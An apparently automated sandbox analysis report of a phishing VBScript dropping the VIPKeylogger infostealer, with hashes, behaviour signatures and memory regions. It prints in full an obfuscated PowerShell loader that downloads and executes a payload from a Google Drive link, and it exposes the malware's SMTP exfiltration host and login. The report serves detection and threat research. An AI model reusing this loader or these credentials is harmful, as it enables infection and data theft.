Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-11-2024 05:40

General

  • Target

    Request for Quotation_MYMRT.vbs

  • Size

    33KB

  • MD5

    f61450af7a076afae98ccd4c8d6b8184

  • SHA1

    4fa061cf9880257caaf3208f4963df4461a3cb56

  • SHA256

    d5d4fab81408eb3fcceeaebae060cc5d1d275139c52f17659998325fd5b7a76b

  • SHA512

    925fa6cc8e2db1c850780627610de88f612a20c5945154dcb68f603b3ea3430a68962533e310daa5d1d158e14fb0ca2ed4be2b2f5ec92e45c97a7975e750ca31

  • SSDEEP

    384:G7O2zToyVATbhB2DxCjbb89g8PhQX71nUK8g7qBfQXa:GrIyM7XfeZQLVugI

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.jacopopacchioni.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Ct2mZ=B-7tCC2019

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Blocklisted process makes network request 13 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1620
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1936

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    2247453c28acd1eb75cfe181540458a8

    SHA1

    851fc5a9950d422d76163fdc6a453d6859d56660

    SHA256

    358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

    SHA512

    42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ygkeupge.013.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\precompelling.Wit

    Filesize

    449KB

    MD5

    121104fabf2ff99a0b51a39ef26be7a0

    SHA1

    2bfe2c2ecb97fc48c7d0819cbbceccdb65e0acd7

    SHA256

    ca1195af4e1d3e7014c66dc288f54119cae1d3e69e10c8617ab69d7b9f2fab85

    SHA512

    c95db7463111bd67979c92f70ac94bc5441983c32cbbf959807edb6c2f9a94ee7bc3154e179b419d486e173428589e22123d78bc949a5e2f63077f54cf4b3b8e

  • memory/1620-49-0x0000000008A00000-0x000000000B256000-memory.dmp

    Filesize

    40.3MB

  • memory/1620-44-0x00000000065A0000-0x00000000065BA000-memory.dmp

    Filesize

    104KB

  • memory/1620-43-0x0000000007820000-0x0000000007E9A000-memory.dmp

    Filesize

    6.5MB

  • memory/1620-42-0x0000000006050000-0x000000000609C000-memory.dmp

    Filesize

    304KB

  • memory/1620-47-0x0000000008450000-0x00000000089F4000-memory.dmp

    Filesize

    5.6MB

  • memory/1620-46-0x0000000007220000-0x0000000007242000-memory.dmp

    Filesize

    136KB

  • memory/1620-25-0x0000000002700000-0x0000000002736000-memory.dmp

    Filesize

    216KB

  • memory/1620-26-0x00000000052D0000-0x00000000058F8000-memory.dmp

    Filesize

    6.2MB

  • memory/1620-27-0x0000000005140000-0x0000000005162000-memory.dmp

    Filesize

    136KB

  • memory/1620-28-0x00000000051E0000-0x0000000005246000-memory.dmp

    Filesize

    408KB

  • memory/1620-29-0x0000000005900000-0x0000000005966000-memory.dmp

    Filesize

    408KB

  • memory/1620-39-0x00000000059E0000-0x0000000005D34000-memory.dmp

    Filesize

    3.3MB

  • memory/1620-45-0x0000000007280000-0x0000000007316000-memory.dmp

    Filesize

    600KB

  • memory/1620-41-0x0000000006020000-0x000000000603E000-memory.dmp

    Filesize

    120KB

  • memory/1936-62-0x0000000001040000-0x0000000002294000-memory.dmp

    Filesize

    18.3MB

  • memory/1936-63-0x0000000001040000-0x000000000108A000-memory.dmp

    Filesize

    296KB

  • memory/1936-72-0x0000000020770000-0x000000002077A000-memory.dmp

    Filesize

    40KB

  • memory/1936-71-0x0000000023930000-0x00000000239C2000-memory.dmp

    Filesize

    584KB

  • memory/1936-68-0x0000000023DC0000-0x00000000242EC000-memory.dmp

    Filesize

    5.2MB

  • memory/1936-67-0x0000000022FB0000-0x0000000023000000-memory.dmp

    Filesize

    320KB

  • memory/1936-66-0x00000000236C0000-0x0000000023882000-memory.dmp

    Filesize

    1.8MB

  • memory/1936-64-0x0000000022C00000-0x0000000022C9C000-memory.dmp

    Filesize

    624KB

  • memory/3032-24-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3032-16-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3032-4-0x00007FF98A933000-0x00007FF98A935000-memory.dmp

    Filesize

    8KB

  • memory/3032-10-0x00000216EE460000-0x00000216EE482000-memory.dmp

    Filesize

    136KB

  • memory/3032-21-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3032-19-0x00007FF98A933000-0x00007FF98A935000-memory.dmp

    Filesize

    8KB

  • memory/3032-15-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3032-20-0x00007FF98A930000-0x00007FF98B3F1000-memory.dmp

    Filesize

    10.8MB